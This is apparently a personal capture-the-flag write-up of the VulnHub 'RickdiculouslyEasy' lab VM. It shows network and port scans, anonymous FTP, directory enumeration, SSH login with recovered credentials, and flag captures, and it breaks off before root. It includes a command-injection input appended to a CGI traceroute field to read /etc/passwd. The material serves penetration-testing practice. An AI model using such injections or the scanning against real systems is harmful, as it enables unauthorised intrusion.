===================Description=================
URL: - https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/

Details: -

This is a fedora server vm, created with virtualbox.

It is a very simple Rick and Morty themed boot to root.

There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root.

It's designed to be a beginner ctf, if you're new to pen testing, check it out!

==============================================

1. 



#netdiscover -i eth0 -r 192.168.1.1/24


 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                              
                                                                                                                                                                                                                                            
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300                                                                                                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     7c:a9:6b:d6:7b:90      1      60  Syrotech Networks. Ltd.                                                                                                                                                                  
 192.168.1.36    10:7b:44:4d:9f:65      1      60  ASUSTek COMPUTER INC.                                                                                                                                                                    
 192.168.1.38    08:00:27:6e:82:50      1      60  PCS Systemtechnik GmbH                                                                                                                                                                   
 192.168.1.41    08:00:27:bf:52:95      1      60  PCS Systemtechnik GmbH                                                                                                                                                                   
 192.168.1.37    48:88:ca:be:a5:6d      1      60  Motorola (Wuhan) Mobility Technologies Communication Co., Ltd.                                                                                                                           
2.
                                                                                                                    ┌──(root💀kali)-[/home/kali/001.Git/OSCP/003.Vulnhub]
└─# nmap 192.168.1.41                                                                                                                                                                                                                  130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-19 01:27 EST
Nmap scan report for 192.168.1.41
Host is up (0.00019s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
                                                                                                                                                                                                                                             
┌──(root💀kali)-[/home/kali/001.Git/OSCP/003.Vulnhub]
└─#                                      

3.

# Nmap 7.92 scan initiated Thu Dec 30 10:12:19 2021 as: nmap -sV -p- -A -oA Rickdiculously 192.168.1.41
Nmap scan report for 192.168.1.41
Host is up (0.00046s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.39
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
| http-methods: 
|_  Potentially risky methods: TRACE
9090/tcp  open  http    Cockpit web service 161 or earlier
|_http-title: Did not follow redirect to https://192.168.1.41:9090/
13337/tcp open  unknown
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (ED25519)
60000/tcp open  unknown
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=12/30%Time=61CDCC59%P=x86_64-pc-linux-gnu%r(NUL
SF:L,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.
SF:4\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.92%I=7%D=12/30%Time=61CDCC59%P=x86_64-pc-linux-gnu%r(
SF:NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.92%I=7%D=12/30%Time=61CDCC5F%P=x86_64-pc-linux-gnu%r(
SF:NULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\
SF:.\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20r
SF:everse\x20shell\.\.\.\n#\x20");
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.1.41

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 30 10:13:09 2021 -- 1 IP address (1 host up) scanned in 51.07 seconds


=================== Port 21 =============

┌──(root💀kali)-[/home/…/OSCP/003.Vulnhub/001.Rickdiculously/port.21]
└─# ftp 192.168.1.41 21
Connected to 192.168.1.41.
220 (vsFTPd 3.0.3)
Name (192.168.1.41:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt

┌──(root💀kali)-[/home/…/OSCP/003.Vulnhub/001.Rickdiculously/port.21]
└─# cat FLAG.txt           
FLAG{Whoa this is unexpected} - 10 Points


================ Port 80 ===============


1. Gobuster

┌──(root💀kali)-[/home/…/OSCP/003.Vulnhub/001.Rickdiculously/port.80]
└─# gobuster dir --wordlist /usr/share/wordlists/dirb/common.txt -u http://192.168.1.41 -o gobuster.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.41
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/01 09:24:28 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 213]
/.htpasswd            (Status: 403) [Size: 218]
/.htaccess            (Status: 403) [Size: 218]
/cgi-bin/             (Status: 403) [Size: 217]
/index.html           (Status: 200) [Size: 326]
/passwords            (Status: 301) [Size: 238] [--> http://192.168.1.41/passwords/]
/robots.txt           (Status: 200) [Size: 126]                                     
                                                                                    
===============================================================
2022/01/01 09:24:29 Finished
===============================================================

2.

┌──(root💀kali)-[/home/…/OSCP/003.Vulnhub/001.Rickdiculously/port.80]
└─# wget http://192.168.1.41/robots.txt
--2022-01-01 09:26:46--  http://192.168.1.41/robots.txt
Connecting to 192.168.1.41:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 126 [text/plain]
Saving to: ‘robots.txt’

robots.txt                   100%[==============================================>]     126  --.-KB/s    in 0s      

2022-01-01 09:26:46 (12.7 MB/s) - ‘robots.txt’ saved [126/126]

                                                                                                                    
┌──(root💀kali)-[/home/…/OSCP/003.Vulnhub/001.Rickdiculously/port.80]
└─# ll
total 8
-rw-r--r-- 1 root root 373 Jan  1 09:24 gobuster.txt
-rw-r--r-- 1 root root 126 Aug 21  2017 robots.txt
                                                                                                                    
┌──(root💀kali)-[/home/…/OSCP/003.Vulnhub/001.Rickdiculously/port.80]
└─# cat robots.txt         
They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*


3. Command injections

http://192.168.1.41/cgi-bin/tracertool.cgi

command ; less /etc/passwd



==================================== Port 22 & 22222 ===============================

┌──(root💀kali)-[/home/…/OSCP/003.Vulnhub/001.Rickdiculously/port.22]
└─# cat Credential.txt 
Username & Password from port 80
Username: Summer
Password: winter
                                    

┌──(root💀kali)-[/home/…/OSCP/003.Vulnhub/001.Rickdiculously/port.22]
└─# ssh Summer@192.168.1.41                                                                                   255 ⨯
kex_exchange_identification: Connection closed by remote host
Connection closed by 192.168.1.41 port 22
                                          

┌──(root💀kali)-[/home/…/OSCP/003.Vulnhub/001.Rickdiculously/port.22.22222]
└─# ssh Summer@192.168.1.41 -p 22222                                                                          255 ⨯
The authenticity of host '[192.168.1.41]:22222 ([192.168.1.41]:22222)' can't be established.
ED25519 key fingerprint is SHA256:RD+qmhxymhbL8Ul9bgsqlDNHrMGfOZAR77D3nqLNwTA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.1.41]:22222' (ED25519) to the list of known hosts.
Summer@192.168.1.41's password: 
client_global_hostkeys_private_confirm: server gave bad signature for RSA key 0: error in libcrypto
Last login: Sun Jan  2 12:17:03 2022
[Summer@localhost ~]$ 
[Summer@localhost ~]$ 
[Summer@localhost ~]$ 


[Summer@localhost ~]$ ll
total 4
-rw-rw-r--. 1 Summer Summer 48 Aug 22  2017 FLAG.txt


[Summer@localhost ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points


┌──(root💀kali)-[~kali/…/OSCP/003.Vulnhub/001.Rickdiculously/port.22.22222]
└─# scp -r -P 22222 Summer@192.168.1.41:/home/* .                                                               1 ⨯
Summer@192.168.1.41's password: 
client_global_hostkeys_private_confirm: server gave bad signature for RSA key 0: error in libcrypto
.bash_logout                                                                      100%   18     1.0KB/s   00:00    
.bash_profile                                                                     100%  193   136.7KB/s   00:00    
.bashrc                                                                           100%  231   163.9KB/s   00:00    
scp: /home/Morty/.bash_history: Permission denied
journal.txt.zip                                                                   100%  414   312.6KB/s   00:00    
Safe_Password.jpg                                                                 100%   42KB   3.5MB/s   00:00    
.bash_logout                                                                      100%   18     3.4KB/s   00:00    
.bash_profile                                                                     100%  193   129.8KB/s   00:00    
.bashrc                                                                           100%  231   165.2KB/s   00:00    
NotAFlag.txt                                                                      100%   95    11.1KB/s   00:00    
safe                                                                              100% 8704     2.3MB/s   00:00    
.bash_logout                                                                      100%   18     8.8KB/s   00:00    
.bash_profile                                                                     100%  193   205.4KB/s   00:00    
.bashrc                                                                           100%  231   294.1KB/s   00:00    
.bash_history                                                                     100%    1     1.0KB/s   00:00    
FLAG.txt                                                                          100%   48    52.7KB/s   00:00   



